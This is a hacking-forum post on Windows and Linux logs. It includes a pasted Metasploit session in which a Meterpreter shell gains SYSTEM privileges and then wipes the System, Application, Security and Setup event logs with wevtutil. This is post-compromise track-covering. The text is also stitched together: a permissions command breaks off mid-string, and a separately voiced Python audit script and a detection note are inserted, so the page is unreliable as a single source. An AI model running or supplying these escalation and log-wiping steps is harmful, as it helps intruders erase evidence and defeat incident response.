Linux/Windows security device logs
Author: 해킹잘하고싶다
Attachment: boot.png (507.4 KB)

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=8576

(The attached image is an example of the /var/log/boot log)

Windows: eventlog
Written as a binary file.

- Clearing Windows server log records with Metasploit -

[*] Sending stage (1189423 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:49164) at 2017-11-10 21:29:00 +0900

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information                      Connection
  --  ----                     -----------                      ----------
  1   meterpreter x64/windows  WIN2008\Administrator @ WIN2008

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 636 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>wevtutil.exe el
wevtutil.exe el
Analytic
Application
....(omitted).....
Microsoft-Windows-osk/Diagnostic
Microsoft-Windows-stobject/Diagnostic
Security
Setup
System
TabletPC_InputPanel_Channel
ThinPrint Diagnostics
WINDOWS_MP4SDECD_CHANNEL
WMPSetup
WMPSyncEngine
Windows PowerShell
microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin

C:\Windows\system32>wevtutil.exe cl "System"
wevtutil.exe cl "System"

C:\Windows\system32>wevtutil.exe cl "Application"
wevtutil.exe cl "Application"

C:\Windows\system32>wevtutil.exe cl "Security"
wevtutil.exe cl "Security"

C:\Windows\system32>wevtutil.exe cl "Setup"
wevtutil.exe cl "Setup"




- How to clear event logs -
1. Start Event Viewer.
2. In the console tree, navigate to the event log you want to clear.
3. On the Action menu, click "Clear Log".
4. You can clear the event log directly, or save a copy of it first and then clear it.
5. To clear an event log from the command line, proceed as follows.

Open a command prompt and enter the following command.

wevtutil cl <LogName> [/bu:<BackupFileName>]

Additional considerations:
To perform this task you must have the "Clear" permission on the log.
Administrators are granted this permission by default.
To give another group the "Clear" permission on a log,
enter a command of the following form.

wevtutil sl <LogName> /ca:<SecurityDescriptor>

To view the SDDL (Security Descriptor Definition Language) string of a log, use the following command.

wevtutil gl <LogName>

For example, to add the "Clear" permission on the "Application" log
for the "Backup Operators" group:

wevtutil sl Application /ca:O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;B
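The defender's counterpart of the commands above is auditing who actually holds the "Clear" right on each log. The following is an added example (not code from the original post): it parses the DACL part of an event-log SDDL string such as the one printed by wevtutil gl, lists the trustees whose ACE carries the event-log Clear bit (0x4, alongside Read 0x1 and Write 0x2), and builds the appended ACE that a wevtutil sl /ca: call would use. The SAMPLE descriptor and the trustee name table are constructed for the example.

```python
import re

# Event-log specific access-mask bits (the ELF_LOGFILE_* rights wevtutil applies).
READ, WRITE, CLEAR = 0x1, 0x2, 0x4

# SDDL trustee abbreviations that commonly appear in event-log descriptors.
WELL_KNOWN = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "BO": "BUILTIN\\Backup Operators",
    "SO": "BUILTIN\\Server Operators",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE",
}

ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_aces(sddl):
    """Return (ace_type, mask, trustee) for each ACE in the DACL (D:) part."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        # Event-log descriptors use hex masks; symbolic rights (GA, GR, ...) are not handled here.
        if len(fields) != 6 or not fields[2].lower().startswith("0x"):
            raise ValueError("unsupported ACE: (%s)" % body)
        ace_type, _flags, rights, _obj, _inh, trustee = fields
        aces.append((ace_type, int(rights, 16), trustee))
    return aces

def who_can_clear(sddl):
    """Trustees granted the Clear bit by an allow ACE and not taken away by a deny ACE."""
    allowed, denied = set(), set()
    for ace_type, mask, trustee in parse_aces(sddl):
        if not mask & CLEAR:
            continue
        if ace_type == "A":
            allowed.add(trustee)
        elif ace_type == "D":
            denied.add(trustee)
    return sorted(WELL_KNOWN.get(t, t) for t in allowed - denied)

def grant_clear(sddl, trustee):
    """Append an allow ACE with read/write/clear (0x7), the shape used in the post's sl example."""
    return sddl + "(A;;0x7;;;%s)" % trustee

# Constructed sample in the shape of the descriptor quoted on the page (not a real dump).
SAMPLE = ("O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)"
          "(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x1;;;S-1-5-32-573)")

if __name__ == "__main__":
    print("can clear:", who_can_clear(SAMPLE))
    print("wevtutil sl Application /ca:" + grant_clear(SAMPLE, "BO"))
```

Clearing a log is itself recorded (Security log: event ID 1102; other logs: event ID 104 in the System log), so a review of those events shows when a clear happened even though the cleared entries are gone.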

Checking the logs (on Windows 2008)

Start > Control Panel > Administrative Tools > Event Viewer > Windows Logs







Linux: syslog (/var/log)
Written as text.
However, some logs are stored in binary form.

#cat /var/log/messages
A text file in a human-readable format.
System changes are recorded here.
In incident response it is hard to find meaningful entries in this file:
it holds many system administration logs but little that relates to an intrusion.
It must still be checked.

#cat /var/log/auth.log
Authentication log; /var/log/secure also exists.
Contains log information on remote and local logins.

#cat /var/log/wtmp
User login/logout and system boot/shutdown history.

#cat /var/run/utmp

  Hit : 106     Date : 2024/05/20 10:42



    